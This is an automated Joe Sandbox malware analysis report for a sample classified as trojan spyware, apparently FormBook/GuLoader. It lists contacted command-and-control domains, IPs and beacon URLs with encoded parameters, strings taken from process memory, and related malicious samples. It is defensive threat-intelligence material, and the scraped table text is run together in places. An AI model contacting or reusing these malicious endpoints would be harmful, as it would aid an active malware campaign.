        https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
        http://www.airportsurvery.com/8cwt/0%Avira URL Cloudsafe
        http://www.innovtech.life/8cwt/?24eluX=SSpGlvD+1syJM+fS7Z8C1Cd2ZLeBmOr+68qPZxMelqgcCM6DsfmVmmLjkXM2/P+9S0q4oxoduwfupYzMqMwdcdYcBeP38sFbk5TUrAJPEOGdI/gD7BvPJp4=&Mjnd0=JZHP8Tx0t60%Avira URL Cloudsafe
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
        http://www.respirelavie.net/8cwt/?24eluX=iQ4bGvtt1bUOdIMmx0FoKxyGgfNtaKfegGtnnpaIA0bWJs9Q4689zouPx5Y4+HL6T4TvrzgawqpIlVOGUgGREoTlcD3Zw3RnhErLbn743FaHB2O7toC+0mA=&Mjnd0=JZHP8Tx0t60%Avira URL Cloudsafe
        http://push.zhanzhang.baidu.com/push.js0%Avira URL Cloudsafe
        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD0%Avira URL Cloudsafe
        http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
        http://www.k4ryd.us/8cwt/?24eluX=wJjsrv+xTFW5EezvLu5DoT5e4On1D8g+dr15EOXITWTD1anv0RLrfGS01TvW8pCuGmfcOvvelUpztksk4WpfZfFxijTtARXG8NIL7Taa8Kq3eoSsUv86NcY=&Mjnd0=JZHP8Tx0t60%Avira URL Cloudsafe
        https://www.google.com0%Avira URL Cloudsafe
        http://push.zhanzhang.baidu.com/push.js1%VirustotalBrowse
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD0%VirustotalBrowse
        http://www.cd14j.us/8cwt/0%Avira URL Cloudsafe
        https://www.google.com0%VirustotalBrowse
        http://www.airportsurvery.com/8cwt/?24eluX=KAkr0JsC36DOGBdb86MaWw8oa5TA2XZrFg5SI4PSAqjqBay0+Mt9GFSkKu0kcsR0pRjPiVoCFffv9kAFnu4p94pvlKRDsoyD63jLrTdFBvrOG4BRdTojXfc=&Mjnd0=JZHP8Tx0t60%Avira URL Cloudsafe
        https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
        https://drive.google.com/0%Avira URL Cloudsafe
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
        http://www.insist.site/0%Avira URL Cloudsafe
        http://www.insist.site/8cwt/0%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%VirustotalBrowse
        http://www.nurenose.com/8cwt/0%Avira URL Cloudsafe
        https://apis.google.com0%Avira URL Cloudsafe
        http://www.k4ryd.us/8cwt/0%Avira URL Cloudsafe
        http://www.shun-yamagata.com/8cwt/0%Avira URL Cloudsafe
        http://www.jdps.org/8cwt/?24eluX=8fvO6riwiNdGIieTsu/tMoq1+6O9galEvK05+Szv2OjuFl7+WHHAVTXMU1G96mraFYLMRcvsh+SJXHUnSCy+mSK3fOJTqBcOyoKopFv0eDv6jorQ0HypEvo=&Mjnd0=JZHP8Tx0t60%Avira URL Cloudsafe
        http://www.nurenose.com/8cwt/?24eluX=ta/RVvqxwt03TPXWzdfJPt4x66UfuVsjNv5QpTaL8gP24YNLrE30I2eSxM0VtxXCv+eA5B8kQfuz0YxEkZl7phijUbluJOwzHO73Kb9kDKOg+aMKAT0Adgs=&Mjnd0=JZHP8Tx0t60%Avira URL Cloudsafe
        http://www.belgravevilla.com/8cwt/?24eluX=/eyPcvofDN2lSaRtaOy598Um2jV4WFkB8F+tj/gurFaBNg3fGC8Bq8tEkH7S9Bted1WP+/9Tvc8BBtdeQx/29+uX5MeVdplxqUx1gZhmZuS5o8pYgM2a/wg=&Mjnd0=JZHP8Tx0t60%Avira URL Cloudsafe
        https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
        http://belgravevilla.com/8cwt/?24eluX=/eyPcvofDN2lSaRtaOy598Um2jV4WFkB8F0%Avira URL Cloudsafe
        https://login.li0%Avira URL Cloudsafe
        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
        https://zz.bdstatic.com/linksubmit/push.js0%Avira URL Cloudsafe
        https://drive.usercontent.google.com/0%Avira URL Cloudsafe
        http://www.belgravevilla.com/8cwt/0%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
        https://www.ecosia.org/newtab/0%Avira URL Cloudsafe
        https://ac.ecosia.org/autocomplete?q=0%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe
        http://www.insist.site/8cwt/?24eluX=hBVPMRA8AXkfi8sX3ZU3xUlYATFWOWKaW/82pjFjYWbiYeLOxLODNY5T0HEKtdu9psozILhwOJRChZ+L+nmp0Ast2pFtgkKWXgnlG+28tA4JhCFPXI/mZUw=&Mjnd0=JZHP8Tx0t60%Avira URL Cloudsafe
        http://www.shun-yamagata.com/8cwt/?24eluX=l+yNdBmIbZk94DyhKMCQgPu5et7F5Fjr+MUK0mOzdhwjPjmD5w+n15/KVowCPgtS4Y9yjKxUIxHTxuQuQfpR6KughRwQexCRaaEyjIZ4vPoy+iMgbgX/vtU=&Mjnd0=JZHP8Tx0t60%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
        https://drive.google.com/uc?0%Avira URL Cloudsafe
        http://www.innovtech.life/8cwt/0%Avira URL Cloudsafe
        http://www.jdps.org/8cwt/0%Avira URL Cloudsafe
        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%Avira URL Cloudsafe
        http://www.shun-yamagata.com0%Avira URL Cloudsafe
        http://www.cd14j.us/8cwt/?24eluX=JIyO8Gc0ZaCUBC4gwloHiifCYtv01LSxCuL3sMDgSuZIErE9iBbFukGcMyuYgIJjP33nSDseYz7bP5VCvKNEdyHwbE4qu9h+y1aodMHm9WSOLrl68ngvcME=&Mjnd0=JZHP8Tx0t60%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        parkingpage.namecheap.com
        		91.195.240.19
        		truefalseunknown
        www.innovtech.life
        		203.161.49.193
        		truetrue
        • 100%, Sophos S4
        • 9%, Virustotal, Browse
        		unknown
        www.auetravel.kz
        		89.35.125.17
        		truefalseunknown
        belgravevilla.com
        		92.205.8.26
        		truefalseunknown
        drive.usercontent.google.com
        		172.217.215.132
        		truefalseunknown
        respirelavie.net
        		192.3.27.169
        		truefalseunknown
        www.shun-yamagata.com
        		162.43.104.164
        		truefalse
          		unknown
          cdl-lb-1356093980.us-east-1.elb.amazonaws.com
          		34.232.203.70
          		truefalseunknown
          brongal.by
          		93.125.99.134
          		truefalseunknown
          www.airportsurvery.com
          		173.232.18.161
          		truefalseunknown
          drive.google.com
          		142.250.217.174
          		truefalseunknown
          www.accentbathrooms.com
          		66.81.203.196
          		truefalseunknown
          www.k4ryd.us
          		91.195.240.123
          		truefalseunknown
          www.cd14j.us
          		91.195.240.123
          		truefalseunknown
          www.insist.site
          		3.64.163.50
          		truefalse
            		unknown
            www.nurenose.com
            		unknown
            		unknowntrueunknown
            www.jdps.org
            		unknown
            		unknowntrueunknown
            www.belgravevilla.com
            		unknown
            		unknowntrue
              		unknown
              www.brongal.by
              		unknown
              		unknowntrueunknown
              www.donumul.com
              		unknown
              		unknowntrue
                		unknown
                www.nemeanshop.com
                		unknown
                		unknowntrue
                  		unknown
                  www.runonbattery.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.respirelavie.net
                    		unknown
                    		unknowntrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.brongal.by/8cwt/false
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.accentbathrooms.com/8cwt/false
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.airportsurvery.com/8cwt/false
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.innovtech.life/8cwt/?24eluX=SSpGlvD+1syJM+fS7Z8C1Cd2ZLeBmOr+68qPZxMelqgcCM6DsfmVmmLjkXM2/P+9S0q4oxoduwfupYzMqMwdcdYcBeP38sFbk5TUrAJPEOGdI/gD7BvPJp4=&Mjnd0=JZHP8Tx0t6true
                    • Sophos S4: malware repository domain
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.respirelavie.net/8cwt/?24eluX=iQ4bGvtt1bUOdIMmx0FoKxyGgfNtaKfegGtnnpaIA0bWJs9Q4689zouPx5Y4+HL6T4TvrzgawqpIlVOGUgGREoTlcD3Zw3RnhErLbn743FaHB2O7toC+0mA=&Mjnd0=JZHP8Tx0t6false
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.k4ryd.us/8cwt/?24eluX=wJjsrv+xTFW5EezvLu5DoT5e4On1D8g+dr15EOXITWTD1anv0RLrfGS01TvW8pCuGmfcOvvelUpztksk4WpfZfFxijTtARXG8NIL7Taa8Kq3eoSsUv86NcY=&Mjnd0=JZHP8Tx0t6false
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.cd14j.us/8cwt/false
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.airportsurvery.com/8cwt/?24eluX=KAkr0JsC36DOGBdb86MaWw8oa5TA2XZrFg5SI4PSAqjqBay0+Mt9GFSkKu0kcsR0pRjPiVoCFffv9kAFnu4p94pvlKRDsoyD63jLrTdFBvrOG4BRdTojXfc=&Mjnd0=JZHP8Tx0t6false
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.insist.site/8cwt/false
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.nurenose.com/8cwt/false
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.k4ryd.us/8cwt/false
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.shun-yamagata.com/8cwt/false
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.jdps.org/8cwt/?24eluX=8fvO6riwiNdGIieTsu/tMoq1+6O9galEvK05+Szv2OjuFl7+WHHAVTXMU1G96mraFYLMRcvsh+SJXHUnSCy+mSK3fOJTqBcOyoKopFv0eDv6jorQ0HypEvo=&Mjnd0=JZHP8Tx0t6false
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.nurenose.com/8cwt/?24eluX=ta/RVvqxwt03TPXWzdfJPt4x66UfuVsjNv5QpTaL8gP24YNLrE30I2eSxM0VtxXCv+eA5B8kQfuz0YxEkZl7phijUbluJOwzHO73Kb9kDKOg+aMKAT0Adgs=&Mjnd0=JZHP8Tx0t6false
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.belgravevilla.com/8cwt/?24eluX=/eyPcvofDN2lSaRtaOy598Um2jV4WFkB8F+tj/gurFaBNg3fGC8Bq8tEkH7S9Bted1WP+/9Tvc8BBtdeQx/29+uX5MeVdplxqUx1gZhmZuS5o8pYgM2a/wg=&Mjnd0=JZHP8Tx0t6false
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.belgravevilla.com/8cwt/false
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.insist.site/8cwt/?24eluX=hBVPMRA8AXkfi8sX3ZU3xUlYATFWOWKaW/82pjFjYWbiYeLOxLODNY5T0HEKtdu9psozILhwOJRChZ+L+nmp0Ast2pFtgkKWXgnlG+28tA4JhCFPXI/mZUw=&Mjnd0=JZHP8Tx0t6false
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.shun-yamagata.com/8cwt/?24eluX=l+yNdBmIbZk94DyhKMCQgPu5et7F5Fjr+MUK0mOzdhwjPjmD5w+n15/KVowCPgtS4Y9yjKxUIxHTxuQuQfpR6KughRwQexCRaaEyjIZ4vPoy+iMgbgX/vtU=&Mjnd0=JZHP8Tx0t6false
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.innovtech.life/8cwt/true
                    • Sophos S4: malware repository domain
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.jdps.org/8cwt/false
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.cd14j.us/8cwt/?24eluX=JIyO8Gc0ZaCUBC4gwloHiifCYtv01LSxCuL3sMDgSuZIErE9iBbFukGcMyuYgIJjP33nSDseYz7bP5VCvKNEdyHwbE4qu9h+y1aodMHm9WSOLrl68ngvcME=&Mjnd0=JZHP8Tx0t6false
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabsecinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchsecinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://brongal.by/8cwt/?24eluX=2L0w4dAlDepmBmTjVKMMeU7pTlJruWimQKtzQaHnPyexis6Apolau4secinit.exe, 0000000A.00000002.83835201510.00000000042E4000.00000004.10000000.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83834401925.0000000004484000.00000004.00000001.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://login.lihttps://login.li0secinit.exe, 0000000A.00000002.83830820007.000000000010B000.00000004.00000010.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.fJuwM4Bwi7.exe, 00000008.00000001.78926393304.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://push.zhanzhang.baidu.com/push.jssecinit.exe, 0000000A.00000002.83836936890.0000000005AD0000.00000004.00000800.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83835201510.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83834401925.0000000003986000.00000004.00000001.00040000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDfJuwM4Bwi7.exe, 00000008.00000001.78926393304.0000000000626000.00000020.00000001.01000000.00000007.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.gopher.ftp://ftp.fJuwM4Bwi7.exe, 00000008.00000001.78926393304.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.comfJuwM4Bwi7.exe, 00000008.00000003.79036970427.00000000026A2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdfJuwM4Bwi7.exe, 00000008.00000001.78926393304.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://drive.google.com/fJuwM4Bwi7.exe, 00000008.00000002.79181660044.000000000263E000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79181660044.0000000002672000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214fJuwM4Bwi7.exe, 00000008.00000001.78926393304.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.insist.site/secinit.exe, 0000000A.00000002.83835201510.000000000479A000.00000004.10000000.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83834401925.000000000493A000.00000004.00000001.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://apis.google.comfJuwM4Bwi7.exe, 00000008.00000003.79036970427.00000000026A2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icosecinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://belgravevilla.com/8cwt/?24eluX=/eyPcvofDN2lSaRtaOy598Um2jV4WFkB8Fsecinit.exe, 0000000A.00000002.83835201510.0000000004608000.00000004.10000000.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83834401925.00000000047A8000.00000004.00000001.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://login.lisecinit.exe, 0000000A.00000002.83830820007.000000000010B000.00000004.00000010.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://zz.bdstatic.com/linksubmit/push.jssecinit.exe, 0000000A.00000002.83836936890.0000000005AD0000.00000004.00000800.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83835201510.00000000037E6000.00000004.10000000.00040000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83834401925.0000000003986000.00000004.00000001.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://drive.usercontent.google.com/fJuwM4Bwi7.exe, 00000008.00000002.79182091174.00000000026A2000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083691361.000000000269F000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083226340.0000000002695000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79053109089.00000000026A2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://nsis.sf.net/NSIS_ErrorErrorfJuwM4Bwi7.exefalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.ecosia.org/newtab/secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ac.ecosia.org/autocomplete?q=secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://nsis.sf.net/NSIS_ErrorfJuwM4Bwi7.exefalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdfJuwM4Bwi7.exe, 00000008.00000001.78926393304.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://drive.google.com/uc?fJuwM4Bwi7.exe, 00000008.00000002.79182091174.00000000026A2000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083691361.000000000269F000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083226340.0000000002695000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79053109089.00000000026A2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=secinit.exe, 0000000A.00000003.79365005031.0000000007598000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.shun-yamagata.comSLePhgUCFUcrYZVod.exe, 0000000B.00000002.83832835974.00000000014AB000.00000040.80000000.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    172.217.215.132
                    		drive.usercontent.google.comUnited States
                    		15169GOOGLEUSfalse
                    91.195.240.123
                    		www.k4ryd.usGermany
                    		47846SEDO-ASDEfalse
                    3.64.163.50
                    		www.insist.siteUnited States
                    		16509AMAZON-02USfalse
                    91.195.240.19
                    		parkingpage.namecheap.comGermany
                    		47846SEDO-ASDEfalse
                    92.205.8.26
                    		belgravevilla.comGermany
                    		8972GD-EMEA-DC-SXB1DEfalse
                    89.35.125.17
                    		www.auetravel.kzRomania
                    		57495BSS-ONEROfalse
                    192.3.27.169
                    		respirelavie.netUnited States
                    		36352AS-COLOCROSSINGUSfalse
                    173.232.18.161
                    		www.airportsurvery.comUnited States
                    		62904EONIX-COMMUNICATIONS-ASBLOCK-62904USfalse
                    142.250.217.174
                    		drive.google.comUnited States
                    		15169GOOGLEUSfalse
                    203.161.49.193
                    		www.innovtech.lifeMalaysia
                    		45899VNPT-AS-VNVNPTCorpVNtrue
                    66.81.203.196
                    		www.accentbathrooms.comVirgin Islands (BRITISH)
                    		40034CONFLUENCE-NETWORK-INCVGfalse
                    34.232.203.70
                    		cdl-lb-1356093980.us-east-1.elb.amazonaws.comUnited States
                    		14618AMAZON-AESUSfalse
                    162.43.104.164
                    		www.shun-yamagata.comUnited States
                    		11333CYBERTRAILSUSfalse
                    93.125.99.134
                    		brongal.byBelarus
                    		6697BELPAK-ASBELPAKBYfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1451684
                    Start date and time:2024-06-04 14:12:11 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 17m 32s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                    Run name:Suspected Instruction Hammering
                    Number of analysed new started processes analysed:11
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:2
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Sample name:fJuwM4Bwi7.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@7/22@21/14
                    EGA Information:
                    • Successful, ratio: 66.7%
                    HCA Information:
                    • Successful, ratio: 69%
                    • Number of executed functions: 53
                    • Number of non-executed functions: 255
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe
                    • Excluded domains from analysis (whitelisted): www.bing.com, assets.msn.com, ctldl.windowsupdate.com, nexusrules.officeapps.live.com, api.msn.com
                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    08:15:34API Interceptor26003923x Sleep call for process: secinit.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    91.195.240.123anebilledes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.k4ryd.us/8cwt/
                    Mekanikken.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.l7aeh.us/udud/
                    Nondesistance.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.l7aeh.us/udud/
                    Platosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.k4ryd.us/8cwt/
                    ShippingDoc_23052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.lm2ue.us/n1wh/
                    Forfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.l7aeh.us/udud/
                    Twrchtrywth.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.k4ryd.us/8cwt/
                    00773863008311110023.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                    • www.hylob.lat/s8o3/
                    OX-IN-031-17_ JPE.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                    • www.uc9d1.us/g0dh/
                    Request for Quotation # 3200025006.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.cd14j.us/ntpp/
                    3.64.163.5002062024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.afelon.vote/oe02/
                    anebilledes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.insist.site/8cwt/
                    po8909893299832.exeGet hashmaliciousFormBookBrowse
                    • www.blogonrunning.com/hd05/?mJBXxJ=L307NeH5fWkLgKK43su7TNgrL3oq/VFX5jHnogZ3Xy90kbIeezXbjunmo4QVhDvcCpqA&_hrl=jxopsZ
                    Mekanikken.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.mindfreak.live/udud/
                    PO JAN 2024.exeGet hashmaliciousFormBookBrowse
                    • www.hitbass.com/uonn/
                    Nondesistance.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.mindfreak.live/udud/
                    Platosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.insist.site/8cwt/
                    Forfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • www.mindfreak.live/udud/
                    file.exeGet hashmaliciousUnknownBrowse
                    • protonmail.uk/admin
                    Product Listsd#U0334r#U0334o#U0334w#U0334..exeGet hashmaliciousFormBookBrowse
                    • www.buyduffelbag.com/pshj/

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    parkingpage.namecheap.com9hD6o07kwl.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    TFMUpLhFq6.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    g7cydE7LET.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    cjHq1JOaAQ.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    vtIgsP95Bm.exeGet hashmaliciousFormBook, GuLoader, LummaC StealerBrowse
                    • 91.195.240.19
                    CHKS2400304.pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                    • 91.195.240.19
                    yPURXYpFVuXra2o.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    BASF Purchase Order.docGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    yiLe926pJsBgixu.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                    • 91.195.240.19
                    www.auetravel.kzvtIgsP95Bm.exeGet hashmaliciousFormBook, GuLoader, LummaC StealerBrowse
                    • 89.35.125.17
                    Factura 02297-23042024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 89.35.125.17
                    anebilledes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 89.35.125.17
                    Tenuto.exeGet hashmaliciousFormBook, GuLoader, LummaC StealerBrowse
                    • 89.35.125.17
                    Platosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 89.35.125.17
                    Twrchtrywth.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 89.35.125.17
                    Konstabelens65.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 89.35.125.17
                    Company profile.pif.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                    • 89.35.125.17
                    Stolprende.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 89.35.125.17
                    Scries.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 89.35.125.17
                    www.innovtech.lifeRFQ 5654077845567895504_d0c.exeGet hashmaliciousFormBookBrowse
                    • 203.161.49.193
                    anebilledes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 203.161.49.193
                    SCAN_0033245554672760018765524126524_pdf.exeGet hashmaliciousFormBookBrowse
                    • 203.161.49.193
                    RFQ _ARC 101011-24.exeGet hashmaliciousFormBookBrowse
                    • 203.161.49.193
                    Platosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 203.161.49.193
                    Twrchtrywth.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 203.161.49.193
                    Scries.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 203.161.49.193
                    Fyge206.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 203.161.49.193

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    GD-EMEA-DC-SXB1DEcbIcBAgY5W.exeGet hashmaliciousSystemBCBrowse
